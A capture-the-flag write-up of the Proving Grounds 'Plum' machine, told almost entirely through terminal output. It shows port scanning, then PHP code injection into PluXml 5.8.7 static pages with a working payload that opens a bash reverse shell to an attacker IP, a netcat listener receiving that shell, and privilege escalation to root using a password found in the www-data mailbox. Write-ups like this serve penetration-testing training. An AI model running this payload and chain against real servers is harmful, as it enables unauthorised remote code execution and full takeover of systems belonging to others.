Proving Grounds Plum WriteUp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/2-codo]
└─$ sudo nmap -n -r --min-rate=3500 -F -sSV  192.168.196.28
[sudo] xavier 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 22:17 CST
Nmap scan report for 192.168.196.28
Host is up (0.14s latency).
Not shown: 98 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

1
2
3
4
5

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/2-codo]
└─$ searchsploit pluxml 

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/2-codo]
└─$ searchsploit -x php/webapps/18828.txt

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

## 1 Application
https://github.com/pluxml/PluXml

## 2 Introductory Remarks
There is already an issue regarding a different RCE vulnerability (https://github.com/pluxml/PluXml/issues/321). In contrast to our vulnerability,said RCE only works when using the config file parameter with admin privileges,which is not possible as a moderator.

## 3 Description of the Vulnerability
In the PluXml PHP blogging platform (v5.8.7), a user with the manager role can inject arbitrary PHP code that is executed on the server. As a consequence, remote code execution (RCE) becomes possible, as illustrated in this unlisted (non-public) youtube video: https://youtu.be/Gbe2UNCB0tY.

## 4 Steps to Reproduce the Exploit
1. Login with a manager account.
2. In the Administration menu, select static pages and edit one of the pages.
3. Insert PHP code with starting and closing tags <?php CODE ?>.
4. Save the changes and open the stored page.

## 5 Technical Description of the Vulnerability
While the administrator role has the permission to edit PHP templates and, thus, can always execute arbitrary code, the manager role has no such privileges. Indeed, a manager can only edit so-called static - purely HTML-written- pages. However, in the file core/admin/statique.php and in the file core/admin/lib/class.plx.admin.php (in the function editStatique) no proper input sanitisation is done to filter PHP-opening- and closing-tags (<?php and ?>). As a consequence, the injected PHP code becomes executed on the server-side, even though it is integrated with HTML content. Additionally,note that an XSS-attack is also possible for a manager (proof of concept: by integrating <script>alert(/xss/)</script>) and hard to filter.

1

<?php echo '123<br>'; system("bash -c 'bash -i >& /dev/tcp/192.168.45.246/9001 0>&1'");?>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/2-codo]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.45.246] from (UNKNOWN) [192.168.196.28] 52096
bash: cannot set terminal process group (784): Inappropriate ioctl for device
bash: no job control in this shell
www-data@plum:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@plum:/var/www/html$ 
www-data@plum:/tmp$ cat /var/www/local.txt
cat /var/www/local.txt
3eeae195eb57983b4e679071f3098211

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/www/html/data/statiques/001.static-1.php
/var/www/html/data/configuration/statiques.xml
/var/mail/www-data
/var/log/journal/c71e29ed9c494834b5aab51454fe3ee0/system.journal
/var/log/messages
/var/log/btmp
/var/log/syslog
/var/log/kern.log
/var/log/daemon.log
/var/log/auth.log
/tmp/GCONV_PATH=./.pkexec
/tmp/passwd.bak
/tmp/.pkexec/gconv-modules
/tmp/1.txt

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318

www-data@plum:/tmp$ cat /var/mail/www-data
cat /var/mail/www-data
From root@localhost Fri Aug 25 06:31:47 2023
Return-path: <root@localhost>
Envelope-to: www-data@localhost
Delivery-date: Fri, 25 Aug 2023 06:31:47 -0400
Received: from root by localhost with local (Exim 4.94.2)
        (envelope-from <root@localhost>)
        id 1qZU6V-0000El-Pw
        for www-data@localhost; Fri, 25 Aug 2023 06:31:47 -0400
To: www-data@localhost
From: root@localhost
Subject: URGENT - DDOS ATTACK"
Reply-to: root@localhost
Message-Id: <E1qZU6V-0000El-Pw@localhost>
Date: Fri, 25 Aug 2023 06:31:47 -0400

We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:  
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator

From MAILER-DAEMON Mon Dec 04 10:02:09 2023
Return-path: <>
Envelope-to: www-data@localhost
Delivery-date: Mon, 04 Dec 2023 10:02:09 -0500
Received: from Debian-exim by localhost with local (Exim 4.94.2)
        id 1rAASX-0001gi-JO
        for www-data@localhost; Mon, 04 Dec 2023 10:02:09 -0500
X-Failed-Recipients: debian@localhost
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@localhost>
To: www-data@localhost
References: <E1rAASX-0001fo-IY@localhost>
Content-Type: multipart/report; report-type=delivery-status; boundary=1701702129-eximdsn-2095242606
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1rAASX-0001gi-JO@localhost>
Date: Mon, 04 Dec 2023 10:02:09 -0500

--1701702129-eximdsn-2095242606
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  debian@localhost
    (generated from root@localhost)
    Unrouteable address

--1701702129-eximdsn-2095242606
Content-type: message/delivery-status

Reporting-MTA: dns; localhost

Action: failed
Final-Recipient: rfc822;root@localhost
Status: 5.0.0

--1701702129-eximdsn-2095242606
Content-type: message/rfc822

Return-path: <www-data@localhost>
Received: from www-data by localhost with local (Exim 4.94.2)
        (envelope-from <www-data@localhost>)
        id 1rAASX-0001fo-IY
        for root@localhost; Mon, 04 Dec 2023 10:02:09 -0500
To: root@localhost
Auto-Submitted: auto-generated
Subject: *** SECURITY information for localhost ***
From: www-data <www-data@localhost>
Message-Id: <E1rAASX-0001fo-IY@localhost>
Date: Mon, 04 Dec 2023 10:02:09 -0500

localhost : Dec  4 15:02:09 : www-data : 1 incorrect password attempt ; PWD=/tmp ; USER=root ; COMMAND=list


--1701702129-eximdsn-2095242606--

From MAILER-DAEMON Mon Dec 04 10:06:20 2023
Return-path: <>
Envelope-to: www-data@localhost
Delivery-date: Mon, 04 Dec 2023 10:06:20 -0500
Received: from Debian-exim by localhost with local (Exim 4.94.2)
        id 1rAAWa-0004Mp-Vl
        for www-data@localhost; Mon, 04 Dec 2023 10:06:20 -0500
X-Failed-Recipients: debian@localhost
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@localhost>
To: www-data@localhost
References: <E1rAAWa-0004Mm-VK@localhost>
Content-Type: multipart/report; report-type=delivery-status; boundary=1701702380-eximdsn-199798543
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1rAAWa-0004Mp-Vl@localhost>
Date: Mon, 04 Dec 2023 10:06:20 -0500

--1701702380-eximdsn-199798543
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  debian@localhost
    (generated from root@localhost)
    Unrouteable address

--1701702380-eximdsn-199798543
Content-type: message/delivery-status

Reporting-MTA: dns; localhost

Action: failed
Final-Recipient: rfc822;root@localhost
Status: 5.0.0

--1701702380-eximdsn-199798543
Content-type: message/rfc822

Return-path: <www-data@localhost>
Received: from www-data by localhost with local (Exim 4.94.2)
        (envelope-from <www-data@localhost>)
        id 1rAAWa-0004Mm-VK
        for root@localhost; Mon, 04 Dec 2023 10:06:20 -0500
To: root@localhost
Auto-Submitted: auto-generated
Subject: *** SECURITY information for localhost ***
From: www-data <www-data@localhost>
Message-Id: <E1rAAWa-0004Mm-VK@localhost>
Date: Mon, 04 Dec 2023 10:06:20 -0500

localhost : Dec  4 15:06:20 : www-data : a password is required ; PWD=/tmp ; USER=root ; COMMAND=list


--1701702380-eximdsn-199798543--

From MAILER-DAEMON Mon Dec 04 10:31:07 2023
Return-path: <>
Envelope-to: www-data@localhost
Delivery-date: Mon, 04 Dec 2023 10:31:07 -0500
Received: from Debian-exim by localhost with local (Exim 4.94.2)
        id 1rAAuZ-0004Px-Lf
        for www-data@localhost; Mon, 04 Dec 2023 10:31:07 -0500
X-Failed-Recipients: debian@localhost
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@localhost>
To: www-data@localhost
References: <E1rAAuZ-0004Pu-LF@localhost>
Content-Type: multipart/report; report-type=delivery-status; boundary=1701703867-eximdsn-1899843490
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1rAAuZ-0004Px-Lf@localhost>
Date: Mon, 04 Dec 2023 10:31:07 -0500

--1701703867-eximdsn-1899843490
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  debian@localhost
    (generated from root@localhost)
    Unrouteable address

--1701703867-eximdsn-1899843490
Content-type: message/delivery-status

Reporting-MTA: dns; localhost

Action: failed
Final-Recipient: rfc822;root@localhost
Status: 5.0.0

--1701703867-eximdsn-1899843490
Content-type: message/rfc822

Return-path: <www-data@localhost>
Received: from www-data by localhost with local (Exim 4.94.2)
        (envelope-from <www-data@localhost>)
        id 1rAAuZ-0004Pu-LF
        for root@localhost; Mon, 04 Dec 2023 10:31:07 -0500
To: root@localhost
Auto-Submitted: auto-generated
Subject: *** SECURITY information for localhost ***
From: www-data <www-data@localhost>
Message-Id: <E1rAAuZ-0004Pu-LF@localhost>
Date: Mon, 04 Dec 2023 10:31:07 -0500

localhost : Dec  4 15:31:07 : www-data : a password is required ; PWD=/var/mail ; USER=root ; COMMAND=list


--1701703867-eximdsn-1899843490--

From MAILER-DAEMON Mon Dec 04 10:47:49 2023
Return-path: <>
Envelope-to: www-data@localhost
Delivery-date: Mon, 04 Dec 2023 10:47:49 -0500
Received: from Debian-exim by localhost with local (Exim 4.94.2)
        id 1rABAj-0004RS-6L
        for www-data@localhost; Mon, 04 Dec 2023 10:47:49 -0500
X-Failed-Recipients: debian@localhost
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@localhost>
To: www-data@localhost
References: <E1rABAj-0004RP-5y@localhost>
Content-Type: multipart/report; report-type=delivery-status; boundary=1701704869-eximdsn-523599222
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1rABAj-0004RS-6L@localhost>
Date: Mon, 04 Dec 2023 10:47:49 -0500

--1701704869-eximdsn-523599222
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  debian@localhost
    (generated from root@localhost)
    Unrouteable address

--1701704869-eximdsn-523599222
Content-type: message/delivery-status

Reporting-MTA: dns; localhost

Action: failed
Final-Recipient: rfc822;root@localhost
Status: 5.0.0

--1701704869-eximdsn-523599222
Content-type: message/rfc822

Return-path: <www-data@localhost>
Received: from www-data by localhost with local (Exim 4.94.2)
        (envelope-from <www-data@localhost>)
        id 1rABAj-0004RP-5y
        for root@localhost; Mon, 04 Dec 2023 10:47:49 -0500
To: root@localhost
Auto-Submitted: auto-generated
Subject: *** SECURITY information for localhost ***
From: www-data <www-data@localhost>
Message-Id: <E1rABAj-0004RP-5y@localhost>
Date: Mon, 04 Dec 2023 10:47:49 -0500

localhost : Dec  4 15:47:49 : www-data : a password is required ; PWD=/var/mail ; USER=root ; COMMAND=list


--1701704869-eximdsn-523599222--

From MAILER-DAEMON Mon Dec 04 10:55:26 2023
Return-path: <>
Envelope-to: www-data@localhost
Delivery-date: Mon, 04 Dec 2023 10:55:26 -0500
Received: from Debian-exim by localhost with local (Exim 4.94.2)
        id 1rABI6-0004Rq-Tm
        for www-data@localhost; Mon, 04 Dec 2023 10:55:26 -0500
X-Failed-Recipients: debian@localhost
Auto-Submitted: auto-replied
From: Mail Delivery System <Mailer-Daemon@localhost>
To: www-data@localhost
References: <E1rABI6-0004Rn-TK@localhost>
Content-Type: multipart/report; report-type=delivery-status; boundary=1701705326-eximdsn-1486237684
MIME-Version: 1.0
Subject: Mail delivery failed: returning message to sender
Message-Id: <E1rABI6-0004Rq-Tm@localhost>
Date: Mon, 04 Dec 2023 10:55:26 -0500

--1701705326-eximdsn-1486237684
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  debian@localhost
    (generated from root@localhost)
    Unrouteable address

--1701705326-eximdsn-1486237684
Content-type: message/delivery-status

Reporting-MTA: dns; localhost

Action: failed
Final-Recipient: rfc822;root@localhost
Status: 5.0.0

--1701705326-eximdsn-1486237684
Content-type: message/rfc822

Return-path: <www-data@localhost>
Received: from www-data by localhost with local (Exim 4.94.2)
        (envelope-from <www-data@localhost>)
        id 1rABI6-0004Rn-TK
        for root@localhost; Mon, 04 Dec 2023 10:55:26 -0500
To: root@localhost
Auto-Submitted: auto-generated
Subject: *** SECURITY information for localhost ***
From: www-data <www-data@localhost>
Message-Id: <E1rABI6-0004Rn-TK@localhost>
Date: Mon, 04 Dec 2023 10:55:26 -0500

localhost : Dec  4 15:55:26 : www-data : a password is required ; PWD=/home ; USER=root ; COMMAND=list


--1701705326-eximdsn-1486237684--

www-data@plum:/tmp$ 

1
2
3
4
5
6

www-data@plum:/tmp$ su root
su root
Password: 6s8kaZZNaZZYBMfh2YEW

id
uid=0(root) gid=0(root) groups=0(root)